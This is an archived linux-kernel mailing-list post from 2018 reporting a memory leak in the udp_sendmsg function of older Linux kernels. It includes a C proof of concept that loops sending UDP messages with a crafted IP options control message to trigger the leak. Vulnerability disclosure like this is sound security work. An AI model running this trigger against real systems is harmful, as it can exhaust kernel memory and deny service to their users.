lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <2dfb1be5.cad3.164fa76e1c4.Coremail.a4651386@163.com>
Date:   Thu, 2 Aug 2018 19:47:32 +0800 (CST)
From:   luo <a4651386@....com>
To:     linux-kernel@...r.kernel.org
Subject: memory leak bug at linux kernel 3.10.108 and Other some versions.

In the process of learning Linux source code, I found a bug。In some versions, he can cause memory leaks, such as 3.10.108, 4.12.14, 3.19.8. Among them, 3.10 is the main line version。The ipc.opt object in the udp_sendmsg function may not be released resulting in a memory leak.Although I found that some other versions have fixed this problem, I did not pay special attention to seeing this vulnerability in the kernel vulnerability list, so I still submitted this bug.

Quan luo   360 ESG Codesafe Team ,罗权  360企业安全集团代码卫士团队


 




#include <stdio.h>
#include <stdlib.h>
#include <sys/select.h> 
#include <sys/socket.h> 
#include <arpa/inet.h> 
#include <netdb.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <fcntl.h>
#include <time.h>
#include <sys/types.h>
#include <pthread.h>
#include <net/if.h>
#include <errno.h>
#include <assert.h>
#define HELLO_WORLD_SERVER_PORT    6666
#define LENGTH_OF_LISTEN_QUEUE 1
#define BUFFER_SIZE 1024
#define FILE_NAME_MAX_SIZE 512
#define SERVER_PORT 8888
#define BUFF_LEN 512
#define SERVER_IP "172.0.5.182"
#define SOL_IP        0
#define IP_RETOPTS    7
#define    IPOPT_CONTROL        0x00
#define IPOPT_COPY        0x80
#define IPOPT_LSRR    (3 |IPOPT_CONTROL|IPOPT_COPY)
#define MAXLINE   256
#define MAX_MMSG_NUM 10
//#define CMSG_ALIGN(len) ( ((len)+sizeof(long)-1) & ~(sizeof(long)-1) )

//#define CMSG_DATA(cmsg)    ((void *)((char *)(cmsg) + CMSG_ALIGN(sizeof(struct cmsghdr))))
int send_opt(int fd1){
   
   
    int clifd;
    struct sockaddr_in ser_addr;
    char buf[BUFF_LEN] = "TEST UDP MSG!\n";
    char option[41]="\x83\x0b\x04\x01\x02\x03\x04\x05\x06\x07\x08";
    struct msghdr  msg;
     //struct sockaddr_un servaddr ;
    struct iovec iov  ;
     struct cmsghdr *cmptr; 
     char buf_con[CMSG_SPACE(11)];
         int  fd ;
    char* p;
clifd=fd1;
   
    //clifd = socket(AF_INET, SOCK_DGRAM, 0);
    //if(clifd < 0)
     //{
         //printf("create socket fail!\n");
         //return -1;
     //}
    ser_addr.sin_family = AF_INET;
    //ser_addr.sin_addr.s_addr = inet_addr(SERVER_IP);
    ser_addr.sin_addr.s_addr = htonl(INADDR_ANY);//0;  //注意网络序转换
    ser_addr.sin_port = htons(SERVER_PORT);  //注意网络序转换
    iov.iov_base =(void*)buf;
    iov.iov_len = MAXLINE;
   
    msg.msg_namelen =sizeof(ser_addr);
    msg.msg_name=&ser_addr;
    msg.msg_iovlen =1;
    msg.msg_iov =&iov;
     /*cmptr = CMSG_FIRSTHDR(&msg); 
     cmptr->cmsg_level = SOL_IP;   
     cmptr->cmsg_type = IP_RETOPTS;
    //msg.msg_control=option;
    //msg.msg_controllen =9;
    CMSG_DATA(cmptr) = option;
    //cmptr->cmsg_level = SOL_SOCKET; 
    cmptr->cmsg_len = CMSG_LEN(9); */
    msg.msg_control = buf_con;
    msg.msg_controllen = sizeof(buf_con);
    cmptr=CMSG_FIRSTHDR(&msg);
    cmptr->cmsg_level = SOL_IP;
    cmptr->cmsg_type = IP_RETOPTS;
    cmptr->cmsg_len = CMSG_LEN(11);
    p=CMSG_DATA(cmptr);
    memcpy(p,option,11);
    sendmsg(clifd, &msg, 0);
    printf("ok\n");
    return 0;
}






int main()
{
    int clifd = socket(AF_INET, SOCK_DGRAM, 0);
    if(clifd < 0)
     {
         printf("create socket fail!\n");
         return -1;
     }
    while(1)
    {
        send_opt(clifd);
    }
   
    return 0;
}






Content of type "text/html" skipped

View attachment "opt_test.c" of type "text/plain" (2651 bytes)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ